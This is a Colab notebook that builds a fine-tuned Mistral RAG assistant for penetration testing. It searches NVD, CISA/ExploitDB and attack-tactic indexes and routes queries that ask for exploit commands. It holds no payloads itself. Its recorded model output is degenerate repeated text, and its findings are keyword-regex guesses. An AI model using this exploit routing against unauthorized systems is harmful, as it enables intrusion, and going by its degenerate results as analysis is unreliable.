In [1]:
# Cell 1: Install Libraries (Stable Version)
# Colab setup cell: installs Unsloth plus the RAG stack through shell-escaped pip,
# then asks the user to restart the runtime before running the remaining cells.
# NOTE(review): neither install is version-pinned, so a re-run may resolve different
# releases than the ones recorded in this cell's saved output (e.g. unsloth 2025.10.10).
print("Installing the stable version of Unsloth...")
# This command installs the latest stable version from PyPI
!pip install "unsloth[colab-new]"

# Retrieval dependencies: LangChain packages, the FAISS CPU index and sentence-transformers.
print("\nInstalling libraries for RAG...")
!pip install -q langchain langchain_community langchain_huggingface faiss-cpu sentence-transformers

print("\n✅ Installation complete. PLEASE RESTART YOUR SESSION NOW.")

Installing the stable version of Unsloth...
Collecting unsloth[colab-new]
  Downloading unsloth-2025.10.10-py3-none-any.whl.metadata (61 kB)
[2K     [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m61.5/61.5 kB[0m [31m6.8 MB/s[0m eta [36m0:00:00[0m
[?25hCollecting unsloth_zoo>=2025.10.11 (from unsloth[colab-new])
  Downloading unsloth_zoo-2025.10.12-py3-none-any.whl.metadata (32 kB)
Collecting tyro (from unsloth[colab-new])
  Downloading tyro-0.9.35-py3-none-any.whl.metadata (12 kB)
Collecting xformers>=0.0.27.post2 (from unsloth[colab-new])
  Downloading xformers-0.0.32.post2-cp39-abi3-manylinux_2_28_x86_64.whl.metadata (1.1 kB)
Collecting bitsandbytes!=0.46.0,!=0.48.0,>=0.45.5 (from unsloth[colab-new])
  Downloading bitsandbytes-0.48.1-py3-none-manylinux_2_24_x86_64.whl.metadata (10 kB)
Collecting datasets!=4.0.*,!=4.1.0,>=3.4.1 (from unsloth[colab-new])
  Downloading datasets-4.3.0-py3-none-any.whl.metadata (18 kB)
Collecting transformers!=4.52.0,!=4.52.1,!=4.52.2,!=4.5

In [1]:
# Cell 2: Load BASE Model and Tokenizer
from unsloth import FastLanguageModel
import torch
from google.colab import drive

# --- 1. Mount Google Drive ---
# Later cells read the adapter directory and the FAISS indexes from paths under
# this mount point, so the mount has to succeed before they run.
print("[*] Mounting Google Drive...")
drive.mount('/content/drive')

# --- 2. Configuration ---
# Checkpoint id handed to Unsloth (the name suggests bitsandbytes 4-bit weights).
base_model_name = "unsloth/mistral-7b-instruct-v0.2-bnb-4bit"
# Forwarded to from_pretrained below; the tokenizer calls in later cells cap prompts at 2048 too.
max_seq_length = 2048
# Forwarded unchanged; presumably lets Unsloth choose the dtype — TODO confirm.
dtype = None
load_in_4bit = True

# --- 3. Load the Base Model ---
# Produces the notebook-wide `base_model` and `tokenizer` globals used by every later cell.
print(f"[*] Step 1: Loading BASE model ({base_model_name})...")
base_model, tokenizer = FastLanguageModel.from_pretrained(
    model_name = base_model_name,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
)

# Set the pad token if it's not already set
# (the EOS token is reused for padding; generate() calls below pass it as pad_token_id as well)
if tokenizer.pad_token is None:
    tokenizer.pad_token = tokenizer.eos_token

print("\n✅ Base model and tokenizer loaded successfully.")

🦥 Unsloth: Will patch your computer to enable 2x faster free finetuning.




🦥 Unsloth Zoo will now patch everything to make training faster!
[*] Mounting Google Drive...
Mounted at /content/drive
[*] Step 1: Loading BASE model (unsloth/mistral-7b-instruct-v0.2-bnb-4bit)...
==((====))==  Unsloth 2025.10.10: Fast Mistral patching. Transformers: 4.56.2.
   \\   /|    NVIDIA L4. Num GPUs = 1. Max memory: 22.161 GB. Platform: Linux.
O^O/ \_/ \    Torch: 2.8.0+cu126. CUDA: 8.9. CUDA Toolkit: 12.6. Triton: 3.4.0
\        /    Bfloat16 = TRUE. FA [Xformers = 0.0.32.post2. FA2 = False]
 "-____-"     Free license: http://github.com/unslothai/unsloth
Unsloth: Fast downloading is enabled - ignore downloading bars which are red colored!


model.safetensors:   0%|          | 0.00/4.13G [00:00<?, ?B/s]

generation_config.json:   0%|          | 0.00/155 [00:00<?, ?B/s]

tokenizer_config.json: 0.00B [00:00, ?B/s]

tokenizer.model:   0%|          | 0.00/493k [00:00<?, ?B/s]

special_tokens_map.json:   0%|          | 0.00/438 [00:00<?, ?B/s]

tokenizer.json: 0.00B [00:00, ?B/s]


✅ Base model and tokenizer loaded successfully.


In [2]:
# Cell 2.5: Load Fine-Tuned Model Adapters
from peft import PeftModel

# Directory on the mounted Drive that holds the fine-tuned adapter files.
adapter_path = "/content/drive/My Drive/sih fine tuned model"
print(f"[*] Step 2: Applying fine-tuned adapters from: {adapter_path}")

# This command applies your adapters to the base_model to create the expert model
# NOTE(review): PEFT usually injects the adapter layers into the wrapped model object
# itself, so later `base_model.generate(...)` calls (query classification, JSON
# extraction) may also run with the adapters active — confirm, and wrap those calls in
# `with finetuned_model.disable_adapter():` if true base-model behaviour is required.
finetuned_model = PeftModel.from_pretrained(base_model, adapter_path)

print("✅ Fine-tuned model created successfully.")

[*] Step 2: Applying fine-tuned adapters from: /content/drive/My Drive/sih fine tuned model
✅ Fine-tuned model created successfully.


In [3]:
# Cell 3: Load All Three RAG Databases

from langchain_community.vectorstores import FAISS
from langchain_huggingface import HuggingFaceEmbeddings
import os

# --- 1. Initialize the Embedding Model (do this once) ---
print("\n[*] Initializing embedding model...")
embedding_model = HuggingFaceEmbeddings(model_name="sentence-transformers/all-MiniLM-L6-v2")


def _open_faiss_index(folder, missing_label, loading_label, short_label):
    """Load one FAISS index from `folder`, printing the same progress lines for every database.

    Raises FileNotFoundError (before anything is printed) when `folder` does not exist.
    The three labels only differ in how each message names the database.
    """
    if not os.path.exists(folder):
        raise FileNotFoundError(f"❌ Database {missing_label} not found at: {folder}")

    print(f"\n📦 Loading RAG Database {loading_label}...")
    # allow_dangerous_deserialization=True unpickles the stored docstore; only point
    # this at index folders you created yourself.
    index = FAISS.load_local(
        folder_path=folder,
        embeddings=embedding_model,
        allow_dangerous_deserialization=True,
    )
    print(f"✅ Database {short_label} loaded successfully.")
    return index


# --- 2. Database #1a (NVD) ---
db_path_1a = "/content/drive/My Drive/sih rag/rag 1"
vector_db_1a = _open_faiss_index(db_path_1a, "#1a (NVD)", "#1a (NVD)", "#1a")

# --- 3. Database #1b (CISA & ExploitDB) ---
db_path_1b = "/content/drive/My Drive/sih rag/rag 1 b database"
vector_db_1b = _open_faiss_index(db_path_1b, "#1b (CISA/ExploitDB)", "#1b (CISA & ExploitDB)", "#1b")

# --- 4. Database #2 (Tactics) ---
db_path_2 = "/content/drive/My Drive/sih rag/rag 2"
vector_db_2 = _open_faiss_index(db_path_2, "#2 (Tactics)", "#2 (Tactics & Techniques)", "#2")


[*] Initializing embedding model...


modules.json:   0%|          | 0.00/349 [00:00<?, ?B/s]

config_sentence_transformers.json:   0%|          | 0.00/116 [00:00<?, ?B/s]

README.md: 0.00B [00:00, ?B/s]

sentence_bert_config.json:   0%|          | 0.00/53.0 [00:00<?, ?B/s]

config.json:   0%|          | 0.00/612 [00:00<?, ?B/s]

model.safetensors:   0%|          | 0.00/90.9M [00:00<?, ?B/s]

tokenizer_config.json:   0%|          | 0.00/350 [00:00<?, ?B/s]

vocab.txt: 0.00B [00:00, ?B/s]

tokenizer.json: 0.00B [00:00, ?B/s]

special_tokens_map.json:   0%|          | 0.00/112 [00:00<?, ?B/s]

config.json:   0%|          | 0.00/190 [00:00<?, ?B/s]


📦 Loading RAG Database #1a (NVD)...
✅ Database #1a loaded successfully.

📦 Loading RAG Database #1b (CISA & ExploitDB)...
✅ Database #1b loaded successfully.

📦 Loading RAG Database #2 (Tactics & Techniques)...
✅ Database #2 loaded successfully.


In [4]:
# Cell 4 (Updated): The Intelligent Query Router & Multi-Retriever

def classify_query(user_query):
    """
    Ask the LLM (via `base_model`) to label the intent of `user_query`.

    Args:
        user_query: free-text question from the user.

    Returns:
        One of "attack_tactics", "exploit_commands" or "vulnerability_details".
        "vulnerability_details" is also the default when no label is recognised.
    """
    prompt = f"""[INST] Analyze the user's question and classify its primary intent. Respond with ONLY one of the following three words:
    - 'vulnerability_details': If the question is asking for a description, explanation, or CVSS score.
    - 'exploit_commands': If the question is asking for a specific attack command or exploit.
    - 'attack_tactics': If the question is asking for a high-level plan or attack chain.

    User Question: "{user_query}"
    Classification: [/INST]"""

    # Follow the model's own device instead of assuming a CUDA runtime.
    inputs = tokenizer(prompt, return_tensors="pt").to(base_model.device)
    prompt_length = inputs["input_ids"].shape[1]

    # Use 'base_model' here, not 'model'. Greedy decoding keeps the label deterministic.
    outputs = base_model.generate(
        **inputs,
        max_new_tokens=10,
        do_sample=False,
        pad_token_id=tokenizer.eos_token_id,
    )

    # Decode only the newly generated tokens so the echoed prompt (which names all
    # three labels) can never influence the parse.
    classification = tokenizer.decode(
        outputs[0][prompt_length:], skip_special_tokens=True
    ).strip().lower()

    # The first label the model mentions wins; a later stray word such as
    # "... not an exploit" must not override its actual answer.
    label_markers = (
        ("tactic", "attack_tactics"),
        ("exploit", "exploit_commands"),
        ("vulnerab", "vulnerability_details"),
    )
    found = [
        (classification.find(marker), label)
        for marker, label in label_markers
        if marker in classification
    ]
    if found:
        return min(found)[1]
    return "vulnerability_details"

def retrieve_context(user_query, k=7):
    """
    Classify the query, search the matching vector stores and merge the hits.

    Database #1b is always searched; #2 is added for "attack_tactics" and #1a for
    "vulnerability_details". Returns the page contents of all hits joined by
    a "---" separator line.
    """
    print(f"[*] User Query: '{user_query}'")
    intent = classify_query(user_query)
    print(f"[*] Query Intent Classified as: '{intent}'")

    def _top_k(store):
        # One similarity search returning up to k documents from `store`.
        return store.as_retriever(search_kwargs={"k": k}).invoke(user_query)

    print("--> Searching in Database #1b (CISA & Exploit-DB)...")
    hits = list(_top_k(vector_db_1b))

    if intent == "attack_tactics":
        print("--> Also searching in Database #2 (Tactics & Techniques)...")
        hits += _top_k(vector_db_2)

    if intent == "vulnerability_details":
        print("--> Also searching in Database #1a (NVD)...")
        hits += _top_k(vector_db_1a)

    return "\n---\n".join(doc.page_content for doc in hits)

print("✅ Intelligent Query Router and Multi-Retriever functions are ready.")

✅ Intelligent Query Router and Multi-Retriever functions are ready.


In [5]:
# # Cell 4.5: Install OCR Libraries
# print("Installing Tesseract OCR and supporting libraries...")
# !apt-get install -y tesseract-ocr poppler-utils
# !pip install -q pytesseract pdf2image
# print("✅ OCR libraries installed.")

In [6]:
# Cell 5: Manual PDF Report Uploader (Non-OCR Version)
!pip install PyPDF2
import PyPDF2
from google.colab import files
import PyPDF2 # Use PyPDF2 directly
import io

# Holds the extracted report text; stays "" when nothing usable was uploaded.
combined_report_content = ""
print("Please upload your TEXT-BASED PDF reconnaissance report...")
uploaded = files.upload()

if uploaded:
    # Only the first uploaded file is processed.
    file_name = next(iter(uploaded))
    print(f"\nProcessing '{file_name}'...")
    pdf_bytes = uploaded[file_name]
    try:
        pdf_reader = PyPDF2.PdfReader(io.BytesIO(pdf_bytes))
        num_pages = len(pdf_reader.pages)
        print(f"Successfully read PDF with {num_pages} page(s). Extracting text...")

        # extract_text() may return None/"" for image-only pages, hence the `or ""`.
        page_texts = [page.extract_text() or "" for page in pdf_reader.pages]
        # Join pages with a newline so the last word of one page is not fused with the
        # first word of the next (which would defeat the word-boundary regexes later on).
        # Blank pages are skipped so an all-empty PDF still yields "".
        combined_report_content = "\n".join(text for text in page_texts if text.strip())

        if combined_report_content:
            print("\n✅ Text extraction complete. You can now run the next cell.")
        else:
            print("\n⚠️ Text extraction failed. The PDF might be image-based or corrupted.")

    except Exception as e:
        # Best-effort cell: report the problem and leave the content empty so the
        # downstream cells refuse to run on a half-read document.
        print(f"❌ Error reading PDF file: {e}")
        combined_report_content = ""
else:
    print("\nNo file was selected.")

Collecting PyPDF2
  Downloading pypdf2-3.0.1-py3-none-any.whl.metadata (6.8 kB)
Downloading pypdf2-3.0.1-py3-none-any.whl (232 kB)
[?25l   [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m0.0/232.6 kB[0m [31m?[0m eta [36m-:--:--[0m[2K   [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m232.6/232.6 kB[0m [31m22.5 MB/s[0m eta [36m0:00:00[0m
[?25hInstalling collected packages: PyPDF2
Successfully installed PyPDF2-3.0.1
Please upload your TEXT-BASED PDF reconnaissance report...


Saving full_report_for_analysis.pdf to full_report_for_analysis.pdf

Processing 'full_report_for_analysis.pdf'...
Successfully read PDF with 4 page(s). Extracting text...

✅ Text extraction complete. You can now run the next cell.


In [7]:
# Cell 6 (Updated): Split Report into Semantic Chunks

from langchain.text_splitter import RecursiveCharacterTextSplitter

# Final text chunks handed to the LLM extraction step (stays empty on failure)
report_chunks = []

if not ('combined_report_content' in locals() and combined_report_content):
    print("\n❌ No content loaded. Please run the PDF upload cell first.")
else:
    print("Pre-processing: Splitting the report into semantic chunks...")

    # 1500-character chunks keep each extraction prompt small; the 250-character
    # overlap carries context across chunk borders. Lengths are measured with len().
    text_splitter = RecursiveCharacterTextSplitter(
        length_function=len,
        chunk_overlap=250,
        chunk_size=1500,
    )
    report_chunks = text_splitter.split_text(combined_report_content)

    if not report_chunks:
        print("\n❌ Could not split the report. The content might be empty.")
    else:
        print(f"\n✅ Successfully split the report into {len(report_chunks)} chunks.")
        print("\n--- EXAMPLE CHUNK (This will be input for extraction in next cell) ---")
        # Preview only the first 500 characters of the first chunk
        print(report_chunks[0][:500] + "...")

Pre-processing: Splitting the report into semantic chunks...

✅ Successfully split the report into 8 chunks.

--- EXAMPLE CHUNK (This will be input for extraction in next cell) ---
Vulnerability Assessment & Penetration Test Report
Target: www.securecorp.net (10.10.10.5)
Date: October 15, 2025
Author: Cyber Sentinel AI Test Division
---
Page 2: Table of Contents
1. Executive Summary
2. Engagement Scope & Methodology
3. Findings Summary
4. Detailed Findings
    4.1 CRITICAL: Remote Code Execution via Image Upload Bypass
    4.2 HIGH: Privilege Escalation via Sudo Misconfiguration
    4.3 HIGH: Stored Cross-Site Scripting (XSS) in Comment Section
    4.4 MEDIUM: SQL Injectio...


In [8]:
# Cell 7.5 (Updated): Hybrid Regex + JSON Vulnerability Extraction (With Fixes)
import re
import json
from IPython.display import display, Markdown
from tqdm.notebook import tqdm
import time
import torch  # Ensure torch is imported for no_grad

# Regex patterns for the chunk pre-scan (all are applied with re.IGNORECASE).
# None of them contains a capturing group, so re.findall returns whole matches.
CVE_PATTERN = r"\bCVE-\d{4}-\d+\b"
CWE_PATTERN = r"\bCWE-\d+\b"
# "CVSS", an optional version tag (v3 / v3.0 / v3.1 / " 3.1"), an optional
# "score" / "base score" label, an optional colon, then the score itself.
# Whitespace around the colon is optional ("CVSS:9.8") and a score of 10 / 10.0 is
# captured in full instead of being cut down to its first digit.
CVSS_PATTERN = (
    r"CVSS(?:\s*v?3(?:\.[01])?)?(?:\s+(?:base\s+)?score)?"
    r"\s*:?\s*(?:10(?:\.0)?|\d(?:\.\d+)?)"
)
# Each keyword pattern contributes at most one hit per chunk.
VULN_KEYWORDS = [r"\bvulnerab", r"\bexploit\b", r"\bremote code execution\b", r"\bprivilege escalation\b",
                 r"\bbuffer overflow\b", r"\bSQL injection\b", r"\bXSS\b", r"\bRCE\b"]

# Helper: Extract matches from chunk
def extract_with_regex(chunk):
    """Scan a report chunk with the module-level patterns.

    Args:
        chunk: text of one report chunk.

    Returns:
        A dict with the keys 'cves', 'cwes', 'cvss_scores', 'keywords' and
        'evidence_snippets' (at most three context excerpts), or None when
        nothing matched at all.
    """
    flags = re.IGNORECASE

    # Keep the match objects: their positions are needed for the evidence excerpts.
    identifier_hits = {
        'cves': list(re.finditer(CVE_PATTERN, chunk, flags)),
        'cwes': list(re.finditer(CWE_PATTERN, chunk, flags)),
        'cvss_scores': list(re.finditer(CVSS_PATTERN, chunk, flags)),
    }
    matches = {name: [hit.group() for hit in hits] for name, hits in identifier_hits.items()}

    # One search per keyword pattern; the first occurrence is recorded.
    keyword_hits = (re.search(kw, chunk, flags) for kw in VULN_KEYWORDS)
    matches['keywords'] = [hit.group() for hit in keyword_hits if hit]

    # Evidence: 25 characters of context on each side of every identifier match.
    # Using the real match position (instead of str.find on the matched text) gives a
    # repeated identifier its own context, and identical excerpts are kept only once.
    evidence = []
    for hits in identifier_hits.values():
        for hit in hits:
            snippet = chunk[max(0, hit.start() - 25):min(len(chunk), hit.end() + 25)]
            if snippet not in evidence:
                evidence.append(snippet)
    matches['evidence_snippets'] = evidence[:3]  # Limit to top 3

    return matches if any(matches.values()) else None  # None if no hits

# NEW: JSON Repair Function (Handles Noisy Outputs)
def repair_json(text):
    """Extract the finding objects from potentially noisy model output.

    The previous regex-based version cut the array at the first ']', so any object
    containing a nested array (e.g. "cves": ["CVE-..."]) failed to parse and was
    silently dropped. This version lets the JSON decoder find where values end.

    Strategy:
      1. Return the first '[' ... ']' span that decodes to a non-empty list of objects.
      2. Otherwise salvage every complete '{...}' object that can be decoded. This
         recovers bare objects and the finished objects of an array that was cut off
         by the generation length limit. (If an outer object is incomplete, a complete
         object nested inside it may be returned instead.)

    Args:
        text: raw model output; None is treated as an empty string.

    Returns:
        A list of dicts, empty when nothing usable was found.
    """
    decoder = json.JSONDecoder()
    text = (text or "").strip()

    # Pass 1: a well-formed array of objects anywhere in the text.
    pos = text.find('[')
    while pos != -1:
        try:
            value, _ = decoder.raw_decode(text, pos)
        except json.JSONDecodeError:
            value = None
        if isinstance(value, list) and value and all(isinstance(item, dict) for item in value):
            return value
        pos = text.find('[', pos + 1)

    # Pass 2: individual objects, in order of appearance.
    salvaged = []
    pos = text.find('{')
    while pos != -1:
        try:
            value, end = decoder.raw_decode(text, pos)
        except json.JSONDecodeError:
            pos = text.find('{', pos + 1)
            continue
        if isinstance(value, dict):
            salvaged.append(value)
        # Continue after the decoded object so its nested objects are not re-read.
        pos = text.find('{', end)
    return salvaged

# Helper: Convert JSON vuln object to Markdown row
def json_to_markdown(vuln):
    """Render one finding dict as a row of the four-column Markdown report table.

    Args:
        vuln: dict with optional keys 'title', 'cves', 'severity', 'description'
            and 'remediation'. Missing, None or blank values fall back to
            placeholder text. 'cves' may be a list, a single string or None.

    Returns:
        "| finding | severity | description | remediation |", where the finding is
        the title followed by the CVE list in parentheses when CVEs are present.
    """
    def _cell(value, default):
        # A table cell must stay on one line and must not contain a raw '|',
        # otherwise the row is split into extra columns.
        text = default if value is None else str(value)
        text = " ".join(text.split()).replace("|", "\\|")
        return text or default

    raw_cves = vuln.get('cves') or []
    if not isinstance(raw_cves, (list, tuple, set)):
        # A bare string would otherwise be joined character by character.
        raw_cves = [raw_cves]
    cves = ', '.join(_cell(cve, '') for cve in raw_cves if cve)

    title = _cell(vuln.get('title'), 'Untitled Finding')
    sev = _cell(vuln.get('severity'), 'UNKNOWN')
    desc = _cell(vuln.get('description'), 'No description')
    rem = _cell(vuln.get('remediation'), 'N/A')

    # Combine title/CVEs for first column
    finding = f"{title} ({cves})" if cves else title
    return f"| {finding} | {sev} | {desc} | {rem} |"

# NEW: Generate Fallback Rows from Regex (Enhanced for Keywords)
def generate_regex_rows(regex_matches, chunk=None):
    """Create fallback finding dicts from regex hits (CVEs, CWEs and keywords).

    Args:
        regex_matches: dict as produced by extract_with_regex; the keys 'cves',
            'cwes', 'keywords' and 'evidence_snippets' are read, all optional.
        chunk: optional source text; its first 100 characters become the evidence
            preview of keyword rows. When omitted, a notebook-level variable named
            `chunk` is used if one exists (the behaviour the extraction loop relied
            on), otherwise the first evidence snippet, otherwise "".

    Returns:
        A list of finding dicts in first-seen order with duplicates removed:
        CVE rows, then CWE rows, then keyword rows.
    """
    if not regex_matches:
        return []

    snippets = regex_matches.get('evidence_snippets') or []
    first_snippet = snippets[0] if snippets else ''

    if chunk is None:
        # Legacy path: this function used to read the loop variable `chunk` directly
        # and raised NameError whenever it was called outside that loop.
        chunk = globals().get('chunk')
    keyword_evidence = chunk[:100] + '...' if isinstance(chunk, str) else first_snippet

    rows = []
    # dict.fromkeys de-duplicates like set() but keeps the order stable between runs.
    for cve in dict.fromkeys(regex_matches.get('cves') or []):
        rows.append({
            'title': f'CVE Alert: {cve}',
            'cves': [cve],
            'severity': 'HIGH',  # Default
            'description': f'Detected CVE {cve} in report.',
            'remediation': 'Investigate and patch immediately.',
            'evidence_snippet': first_snippet,
            'confidence': 'MEDIUM'
        })
    for cwe in dict.fromkeys(regex_matches.get('cwes') or []):
        rows.append({
            'title': f'CWE Alert: {cwe}',
            'cves': [],
            'severity': 'MEDIUM',
            'description': f'Detected CWE {cwe} pattern.',
            'remediation': 'Review for common weakness.',
            'evidence_snippet': first_snippet,
            'confidence': 'LOW'
        })
    # Keyword-based generic rows
    for kw in dict.fromkeys(regex_matches.get('keywords') or []):
        rows.append({
            'title': f'Potential {kw.capitalize()} Issue',
            'cves': [],
            'severity': 'MEDIUM',
            'description': f'Suspicious keyword "{kw}" detected—possible vulnerability.',
            'remediation': 'Manual verification required.',
            'evidence_snippet': keyword_evidence,
            'confidence': 'LOW'
        })
    return rows

# Extraction driver: for every report chunk, collect regex-based fallback rows, ask the
# LLM for a JSON array of findings, then de-duplicate everything into one Markdown table
# that is written to summarized_vulnerability_report.md and displayed.
if 'report_chunks' in locals() and report_chunks:
    print("\n🚀 Enhanced Vulnerability Extraction Starting...")
    start_time = time.time()

    table_header = "| Vulnerability / Finding | Severity | Description & Impact | Recommended Solution |\n| :--- | :--- | :--- | :--- |"
    all_vulns = []  # Collect JSON objects for aggregation

    # NOTE: the loop variable must stay named `chunk`; generate_regex_rows reads it
    # from the notebook namespace for its keyword evidence preview.
    for i, chunk in enumerate(tqdm(report_chunks, desc="Processing Chunks")):
        # Step 1: Regex pre-scan (always run)
        regex_matches = extract_with_regex(chunk)
        has_regex_hits = bool(regex_matches)

        # Generate regex fallback rows immediately (enrich later)
        regex_rows = generate_regex_rows(regex_matches) if has_regex_hits else []
        all_vulns.extend(regex_rows)

        # Step 2: Prepare chunk for LLM (truncate + highlight regex hits)
        chunk_text = chunk[:1200]  # Truncate to fit prompt + context
        if has_regex_hits:
            highlights = f"\n[Regex Highlights: CVEs={regex_matches['cves']}, Keywords={regex_matches['keywords'][:2]}, Evidence={regex_matches['evidence_snippets'][:1]}]"
            chunk_text += highlights  # Boost LLM with evidence

        # Step 3: JSON Extraction Prompt
        analysis_prompt = f"""[INST]
You are a strict extractor. Read the input CHUNK and output ONLY a JSON array (possibly empty) of objects with keys:
- title (short title string)
- cves (array of CVE strings, e.g. ["CVE-2024-12345"])
- severity (one of: CRITICAL, HIGH, MEDIUM, LOW, UNKNOWN)
- description (one-sentence summary)
- remediation (short remediation text or empty string)
- evidence_snippet (exact text excerpt from the chunk supporting this finding)
- confidence (HIGH, MEDIUM, LOW) -- self-assessed

If there are no vulnerabilities, output: []
Do NOT add any other text, explanation, or markup.
[CHUNK]
{chunk_text}
[/INST]"""

        # Generate with base_model. Inputs follow the model's device instead of a
        # hard-coded "cuda".
        inputs = tokenizer(analysis_prompt, return_tensors="pt", truncation=True, max_length=2048).to(base_model.device)
        prompt_length = inputs["input_ids"].shape[1]
        with torch.no_grad():
            # Greedy decoding for consistency. `temperature` and `early_stopping` were
            # dropped: the former is ignored when do_sample=False and the latter only
            # affects beam search, so both merely produced warnings.
            # NOTE(review): 128 new tokens rarely fit more than one seven-field object;
            # raise it if responses keep getting cut off mid-array.
            outputs = base_model.generate(
                **inputs,
                max_new_tokens=128,
                do_sample=False,
                pad_token_id=tokenizer.eos_token_id,
                repetition_penalty=1.1,
            )

        # Decode only the generated tokens so the echoed prompt never reaches the parser.
        response_text = tokenizer.decode(
            outputs[0][prompt_length:], skip_special_tokens=True
        ).split('[/INST]')[-1].strip()

        # DEBUG: Print raw response (remove after fixing)
        print(f"  Chunk {i+1} Raw Response (first 200 chars): '{response_text[:200]}...'")

        # Step 4: Parse JSON with Repair
        vulns_json = repair_json(response_text)
        if isinstance(vulns_json, list):
            # Keep only dict items (anything else would crash on .get) whose
            # self-assessed confidence is HIGH or MEDIUM, compared case-insensitively.
            filtered_vulns = [
                v for v in vulns_json
                if isinstance(v, dict)
                and str(v.get('confidence', 'LOW')).upper() in ('HIGH', 'MEDIUM')
            ]
            all_vulns.extend(filtered_vulns)
            print(f"  Chunk {i+1}: {len(filtered_vulns)} vulns from JSON + {len(regex_rows)} from regex")
        else:
            print(f"  Chunk {i+1}: Still invalid after repair—using regex only")

        # Debug print for regex
        if has_regex_hits:
            print(f"    Regex hits: {len(regex_matches['cves'])} CVEs, {len(regex_matches['keywords'])} keywords")

    # Step 5: Aggregate & Convert to Markdown
    markdown_rows = []
    seen_findings = set()  # Dedupe by title + CVE
    for vuln in all_vulns:
        row_key = f"{vuln.get('title', '')}_{vuln.get('cves', [])}"
        if row_key not in seen_findings:
            seen_findings.add(row_key)
            markdown_rows.append(json_to_markdown(vuln))

    markdown_rows = markdown_rows[:15]  # Cap for table readability

    # Save & Display. The file is written as UTF-8 explicitly because the chatbot
    # cell reads it back with encoding="utf-8" and the rows contain non-ASCII text.
    if markdown_rows:
        final_report_md = table_header + "\n" + "\n".join(markdown_rows)
        with open("summarized_vulnerability_report.md", "w", encoding="utf-8") as f:
            f.write(final_report_md)
        print(f"\n⏱️ Total time: {time.time() - start_time:.1f}s | Rows: {len(markdown_rows)}")
        print("\n" + "="*50 + " FINAL REPORT " + "="*50)
        display(Markdown(final_report_md))
    else:
        # Fallback empty table
        fallback_md = table_header + "\n| No vulnerabilities detected | N/A | Full scan complete—recommend manual review. | Re-run with deeper tools. |"
        with open("summarized_vulnerability_report.md", "w", encoding="utf-8") as f:
            f.write(fallback_md)
        print(f"\n⏱️ Total time: {time.time() - start_time:.1f}s | No rows—check report content.")
        display(Markdown(fallback_md))
else:
    print("\n❌ Run PDF extraction and chunking first.")


🚀 Enhanced Vulnerability Extraction Starting...


Processing Chunks:   0%|          | 0/8 [00:00<?, ?it/s]

  Chunk 1 Raw Response (first 200 chars): '[INSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINS...'
  Chunk 1: 0 vulns from JSON + 5 from regex
    Regex hits: 0 CVEs, 5 keywords
  Chunk 2 Raw Response (first 200 chars): '[INSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINS...'
  Chunk 2: 0 vulns from JSON + 3 from regex
    Regex hits: 0 CVEs, 3 keywords
  Chunk 3 Raw Response (first 200 chars): '[INSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINS...'
  Chunk 3: 0 vulns from JSON + 5 from regex
    Regex hits: 0 CVEs, 5 keywords
  Chunk 4 Raw Respo

| Vulnerability / Finding | Severity | Description & Impact | Recommended Solution |
| :--- | :--- | :--- | :--- |
| Potential Sql injection Issue | MEDIUM | Suspicious keyword "SQL Injection" detected—possible vulnerability. | Manual verification required. |
| Potential Xss Issue | MEDIUM | Suspicious keyword "XSS" detected—possible vulnerability. | Manual verification required. |
| Potential Vulnerab Issue | MEDIUM | Suspicious keyword "Vulnerab" detected—possible vulnerability. | Manual verification required. |
| Potential Remote code execution Issue | MEDIUM | Suspicious keyword "Remote Code Execution" detected—possible vulnerability. | Manual verification required. |
| Potential Privilege escalation Issue | MEDIUM | Suspicious keyword "Privilege Escalation" detected—possible vulnerability. | Manual verification required. |
| CVE Alert: CVE-2023-51443 (CVE-2023-51443) | HIGH | Detected CVE CVE-2023-51443 in report. | Investigate and patch immediately. |

In [9]:
# Final Cell (Updated): The "Grounding and Verification" Chatbot (Fixed Decoding & RAG - Optimized Output)

from IPython.display import display, Markdown, HTML
import ipywidgets as widgets
import re
import torch  # Ensure torch for no_grad

# Notebook-wide device handle, defined at top level so the functions below can see it
if torch.cuda.is_available():
    device = "cuda"
else:
    device = "cpu"
print(f"[*] Device set to {device}")

# --- 1. Load the SUMMARIZED Report Context (From Extraction) ---
# A missing file is replaced by a sentinel table row, which is swapped out just below.
try:
    with open("summarized_vulnerability_report.md", "r", encoding="utf-8") as f:
        vulnerability_context = f.read()
except FileNotFoundError:
    print("❌ 'summarized_vulnerability_report.md' not found. Run the extraction cell (e.g., Cell 7.5) first.")
    vulnerability_context = "| No vulnerabilities extracted | N/A | Please run extraction. | N/A |"
else:
    print("✅ Loaded summarized_vulnerability_report.md for grounding.")

# When only the sentinel row is present, prefer the raw report text if it was loaded
if vulnerability_context.strip() == "| No vulnerabilities extracted | N/A | Please run extraction. | N/A |":
    if not ('combined_report_content' in globals() and combined_report_content):
        vulnerability_context = "No report available."
    else:
        vulnerability_context = combined_report_content
        print("⚠️ Using combined_report_content as fallback.")

# Keep at most 1500 characters of context so the prompt does not overflow
if len(vulnerability_context) > 1500:
    vulnerability_context = vulnerability_context[:1500] + "\n... (truncated for brevity)"

# --- 2. Core logic (Unsloth-Optimized) ---
def get_chatbot_response(user_query, max_rag_chars=1500):
    """
    Build the grounded prompt for `user_query` and generate a reply with `finetuned_model`.

    Steps:
      1. If the query names a CVE, retrieve RAG context for that CVE. If it instead
         contains an exploit-related keyword, retrieve context for the first
         "SEVERITY: name" line found in `vulnerability_context`.
      2. Generate from the few-shot prompt and decode only the newly generated tokens.
